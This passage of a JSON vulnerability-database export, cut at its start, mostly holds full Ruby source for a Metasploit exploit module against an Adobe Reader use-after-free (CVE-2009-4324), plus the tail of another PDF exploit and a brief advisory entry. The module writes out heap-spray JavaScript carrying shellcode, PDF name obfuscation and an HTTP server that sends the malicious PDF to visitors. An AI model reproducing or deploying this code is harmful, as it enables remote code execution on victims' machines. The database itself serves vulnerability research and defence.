\">\"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(js)\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0d\\x0a\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\t\tpdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16623/"}, {"lastseen": "2016-02-02T00:00:56", "bulletinFamily": "exploit", "description": "Adobe Doc.media.newPlayer Use After Free Vulnerability. CVE-2009-4324. Local exploit for windows platform", "modified": "2010-04-30T00:00:00", "published": "2010-04-30T00:00:00", "id": "EDB-ID:16503", "href": "https://www.exploit-db.com/exploits/16503/", "type": "exploitdb", "title": "Adobe Doc.media.newPlayer Use After Free Vulnerability", "sourceData": "##\r\n# $Id: adobe_media_newplayer.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\r\n\t\t\t\tProfessional versions up to and including 9.2.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'unknown', # Found in the wild\r\n\t\t\t\t\t# Metasploit version by:\r\n\t\t\t\t\t'hdm',\r\n\t\t\t\t\t'pusscat',\r\n\t\t\t\t\t'jduck',\r\n\t\t\t\t\t'jabra'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-4324' ],\r\n\t\t\t\t\t[ 'BID', '37331' ],\r\n\t\t\t\t\t[ 'OSVDB', '60980' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# test results (on Windows XP SP3)\r\n\t\t\t\t\t# reader 6.0.1 - vulnerable / doesn't work\r\n\t\t\t\t\t# reader 7.0.5 - untested\r\n\t\t\t\t\t# reader 7.0.8 - untested\r\n\t\t\t\t\t# reader 7.0.9 - vulnerable / doesn't work\r\n\t\t\t\t\t# reader 7.1.0 - untested\r\n\t\t\t\t\t# reader 7.1.1 - untested\r\n\t\t\t\t\t# reader 8.0.0 - untested\r\n\t\t\t\t\t# reader 8.1.1 - works\r\n\t\t\t\t\t# reader 8.1.2 - untested\r\n\t\t\t\t\t# reader 8.1.3 - untested\r\n\t\t\t\t\t# reader 8.1.4 - untested\r\n\t\t\t\t\t# reader 8.1.5 - untested\r\n\t\t\t\t\t# reader 8.1.6 - untested\r\n\t\t\t\t\t# reader 9.0.0 - untested\r\n\t\t\t\t\t# reader 9.1.0 - works\r\n\t\t\t\t\t# reader 9.2 - works (no debugger, no DEP)\r\n\t\t\t\t\t[ 'Adobe Reader Windows English (JS Heap Spray)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Size' => (0x10000/2),\r\n\t\t\t\t\t\t\t'Ret' => 0x0c0c0c0c\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Adobe Reader Windows German (JS Heap Spray)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Size' => (0x10000/2),\r\n\t\t\t\t\t\t\t'Ret' => 0x0a0a0a0a\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 14 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Make some nops\r\n\t\tnops = Rex::Text.to_unescape([target.ret].pack('V'))\r\n\r\n\t\t# Randomize variables\r\n\t\t#\r\n\t\tlen = 72\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\t\trand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\r\n\t\tvtbuf = [target.ret].pack('V') * 4\r\n\t\tvtbuf << rand_text_alpha(len - vtbuf.length)\r\n\t\tvtbuf.gsub!(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\t\tretstring = Rex::Text.to_unescape(vtbuf)\r\n\r\n\t\t# The printd strings are 72 bytes (??)\r\n\t\tscript = %Q|\r\nvar #{rand1} = unescape(\"#{shellcode}\");\r\nvar #{rand2} = unescape(\"#{nops}\");\r\nvar #{rand3} = unescape(\"#{retstring}\");\r\nwhile(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};\r\n#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);\r\nmemory=new Array();\r\nfor(i=0;i<0x2000;i++) { memory[i]= #{rand2} + #{rand1}; }\r\nutil.printd(\"#{rand4}\", new Date());\r\nutil.printd(\"#{rand5}\", new Date());\r\ntry {this.media.newPlayer(null);} catch(e) {}\r\nutil.printd(#{rand3}, new Date());\r\n|\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(script)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\tsend_response(cli, pdf, { 'Content-Type' => 'application/pdf' })\r\n\r\n\t\thandler(cli)\r\n\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\tdef make_pdf(js)\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0d\\x0a\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\t\tpdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16503/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "description": "Code executions, memory corruptions, buffer overflow, integer overflow, DoS on PDF parsing.", "modified": "2010-03-15T00:00:00", "published": "2010-03-15T00:00:00", "id": "SECURITYVULNS:VULN:10516", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10516", "title": "Adobe Acrobat and Reader multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
